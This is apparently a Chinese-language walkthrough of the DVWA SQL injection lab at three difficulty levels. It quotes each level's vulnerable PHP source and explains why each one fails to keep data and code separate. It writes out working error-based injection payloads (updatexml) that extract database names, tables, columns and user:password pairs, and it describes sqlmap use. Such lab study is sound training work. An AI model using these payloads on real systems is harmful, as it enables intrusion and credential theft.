一,Low
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型
判断回显
利用回显获取信息
mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。
SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段
SCHEMA_NAME,这个表中记录了数据库库名。
TABLES表存储用户创建的所有数据库 库名和表名,字段分别为:
TABLES_SCHEMA和TABLES_NAME。
COLUMNS表中存储用户创建的所有数据库的库名、表名、字段名,字段名分别为:
TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME.
利用数据库获取表名
使用BP进行解码,这个是ASCII
利用表明获取字段
利用字段(列)获取字段数据
使用报错注入:
获取数据库名
查询有几张表:
获取表名
获取字段名
获取内容
报错注入完整流程:
获取数据库:
?id=1' and updatexml(1,concat(0x5e,(select database()),0x5e),1)#
查询库中有多少表:
?id=1' and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)#
查询表:
?id=1' and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)#
查询表中的列:
?id=1' and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x5e),1)#
查询数据:
?id=1' and updatexml(1,concat(0x5e,(select group_concat(user,0x3a,password) from users limit 0,1),0x5e),1)#
源码分析:
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
分析步骤:
1,isset检测变量Submit是否已设置并且非 NULL,即判断用户是否点击了Submit按钮。
2,得到用户提交的数据 id
3,利用用户数据拼接成sql语句query
4,使用mysqli_query函数执行sql语句并返回结果给result,若出错,使用die函数报错
5,使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6,使用first、last变量获取row中的first_name、last_name字段,并使用echo打印 用户输入的id和 变量first、last
漏洞原因:
没有进行预编译
用户数据拼接了代码,没有实现代码、数据分离
没有进行敏感字符过滤
二,Medium
使用Hackbar试试POST
源码分析:
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符,如输入单引号’则处理时会在其前面加上右斜杠\来进行转义,如果语句错误则输出相应的错误信息。其中受影响的字符如下:\x00 \n \r \ ' " \x1a
分析步骤:
1,isset检测变量Submit是否已设置并且非 NULL,即判断用户是否点击了Submit按钮。
2,得到用户提交的数据 id,使用mysqli_real_escape_string函数进行转义
3,利用用户数据拼接成sql语句query
4,使用mysqli_query函数执行sql语句并返回结果给result,若出错,使用die函数报错
5,使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6,使用first、last变量获取row中的first_name、last_name字段,并使用echo打印 用户输入的id和 变量first、last
漏洞原因:
没有进行预编译
用户数据拼接了代码,没有实现代码、数据分离
没有很好的对敏感关键字进行过滤。想要利用mysqli_real_escape_string函数进行敏感字符过滤,但是mysqli_real_escape_string函数并不能过滤一些敏感的关键字(如 and or等),它的功能只是转义一些字符,仅成功过滤了',属于开发者对函数功能了解的不够全,网络安全-php安全知识点中有对该函数的解释。
剩下的按照以上操作就可以了
三,Hight
剩下的按照以上做法就可以了
当输入1’时,
说明报错注入没法使用
源码分析:
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
主要步骤:
1,isset检测Session中的id变量是否已设置并且非 NULL
2,得到用户提交的数据 id
3,利用用户数据拼接成sql语句query,id当做字符串
4,使用mysqli_query函数执行sql语句并返回结果给result,若出错,使用die函数报错,错误是自 定义的
5,使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6,使用first、last变量获取row中的first_name、last_name字段,并使用echo打印 用户输入的id和 变量first、last
漏洞原因:
没有进行预编译
用户数据拼接了代码,没有实现代码、数据分离
想要利用session和自定义错误返回来增加安全系数,成功的躲过了Error注入方式
四,使用SQLMap进行测试(LOW)
测试目标存在注入:
使用BP获取Cookie
添加Cookie再测试
获取成功:
查询当前用户下的所有数据库:
查询当前网站数据库的名称:
查询数据库中的表名:
获取表中的字段名:
获取字段内容:
五,布尔盲注(LOW)
2次返回的页面数据不同,说明存在布尔盲注
直接使用sqlmap进行查询
下面的按照上面的做法一一尝试即可。